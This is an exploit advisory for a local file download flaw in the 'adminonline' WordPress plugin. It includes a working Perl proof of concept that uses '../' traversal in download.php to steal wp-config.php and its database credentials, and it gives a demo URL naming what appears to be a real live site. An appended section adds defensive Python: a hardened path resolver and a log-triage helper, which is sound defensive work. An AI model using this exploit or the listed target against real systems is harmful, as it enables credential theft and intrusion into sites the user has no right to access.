Grey Hat Boy

[+] Title         : Wordpress adminonline Plugin Local File Download
[+] Discovered By : Medrik
[+] CMS Home-Page : http://wordpress.org
[+] Found Date    : 2014-06-11
[+] Tested On     : Windows

###################################

With this vulnerability you can download files from the target's local filesystem (Local File Download, LFD). The "file" parameter of the plugin's download.php selects the file that is served, and it is not restricted to the plugin's own directory, so a "../" traversal sequence reaches any file the web server process can read, including wp-config.php with the database credentials.
This is an LFD vulnerability in:

File      : download.php
Parameter : file

########[ Simple Perl Poc ]########
#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;

my $target   = 'your target here';   # e.g. http://host (no trailing slash)
my $confPath = '/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php';

# Fetch the file; LWP::Simple::get returns undef on any HTTP or network failure
my $req = get($target . $confPath);
die "Request failed for $target$confPath\n" unless defined $req;

# wp-config.php begins with a comment block containing "@package WordPress"
if ($req =~ /package WordPress/) {
    print "\n Downloading Config ...";
    open(my $config, '>', 'wp-config.txt') or die "Cannot write wp-config.txt: $!\n";
    print $config $req;
    close($config);
    print "\n $target Config Downloaded To File : wp-config.txt !\n";
} else {
    print "\n $target does not look vulnerable (no WordPress config in the response)\n";
}
########[ End Perl Code ]########

The four "../" segments climb from the plugin's product/ directory to the WordPress root. If the site keeps wp-config.php one level above the document root (a layout WordPress supports), add one more "../".

Vulnerability (Locate) :
http://Vulnerable_Host/wp-content/plugins/adminonline/product/download.php?file=[LFD]

Demo :
http://www.cocl.ca/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php

Gr33tz : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT , Enddo , Explo!ter , YoSeF__HaCkeR , Moji_RideR , E2MA3N - S!Y0U.T4r.6T - 0x0ptim0us - ARTA And All My Friends .
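Added example, written for this page and not taken from the plugin or the advisory author: the unsafe path-resolution pattern behind this class of LFD next to a hardened resolver, plus a log triage helper that flags requests to the vulnerable endpoint whose "file" value the hardened resolver would refuse. The logic is language-agnostic (in PHP the same checks map to basename(), realpath() and a prefix comparison). Assumptions, labelled as such: the web root is /var/www/html, download.php reads files relative to its own directory, and the access-log lines are constructed.

```python
import os
import re
from urllib.parse import unquote, urlsplit, parse_qs

WEB_ROOT = "/var/www/html"  # assumption, not from the advisory
SCRIPT_DIR = os.path.join(WEB_ROOT, "wp-content/plugins/adminonline/product")  # assumption
VULN_PATH = "/wp-content/plugins/adminonline/product/download.php"  # from the advisory


def vulnerable_resolve(file_param: str) -> str:
    """The unsafe pattern: join untrusted input onto a base directory and serve it.
    Four '../' segments from SCRIPT_DIR land on the web root, which is exactly
    the depth of the advisory's payload."""
    return os.path.normpath(os.path.join(SCRIPT_DIR, file_param))


def safe_resolve(file_param: str):
    """Hardened version: absolute path inside SCRIPT_DIR, or None to refuse."""
    candidate = unquote(file_param)  # treat %2e%2e%2f the same as ../ (extra decode is defensive)
    if "\x00" in candidate:  # NUL bytes truncated paths in old PHP; never legitimate here
        return None
    if candidate in ("", ".", "..") or any(c in candidate for c in "/\\"):
        return None  # only a bare filename is acceptable: no directory components at all
    base = os.path.realpath(SCRIPT_DIR)
    resolved = os.path.realpath(os.path.join(base, candidate))
    # Defence in depth: realpath follows symlinks, so a planted link out of the
    # directory fails the containment check even though the name looked harmless.
    if os.path.commonpath([base, resolved]) != base:
        return None
    return resolved


# Constructed sample lines in combined log format (not a real capture).
ACCESS_LOG = [
    '203.0.113.7 - - [11/Jun/2014:10:02:11 +0000] "GET /wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php HTTP/1.1" 200 3112 "-" "libwww-perl/6.05"',
    '198.51.100.4 - - [11/Jun/2014:10:02:30 +0000] "GET /wp-content/plugins/adminonline/product/download.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3112 "-" "curl/7.35"',
    '192.0.2.9 - - [11/Jun/2014:10:03:01 +0000] "GET /wp-content/plugins/adminonline/product/download.php?file=brochure.pdf HTTP/1.1" 200 91022 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [11/Jun/2014:10:03:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def triage_log(lines):
    """Return (client, timestamp, decoded file value, status) for every request to
    the vulnerable endpoint whose file parameter safe_resolve would refuse.
    A 200 on such a request means the file was most likely served."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        client, ts, target, status = m.groups()
        url = urlsplit(target)
        if url.path != VULN_PATH:
            continue
        for value in parse_qs(url.query).get("file", []):  # parse_qs already percent-decodes
            if safe_resolve(value) is None:
                hits.append((client, ts, unquote(value), int(status)))
    return hits


if __name__ == "__main__":
    print("vulnerable:", vulnerable_resolve("../../../../wp-config.php"))
    print("hardened:  ", safe_resolve("../../../../wp-config.php"))
    for hit in triage_log(ACCESS_LOG):
        print("suspicious:", hit)
```

Rejecting any path separator is stricter than a pure realpath containment check, but it matches what a download endpoint actually needs (a filename inside one directory) and leaves no room for encoding tricks; the containment check stays as a second layer.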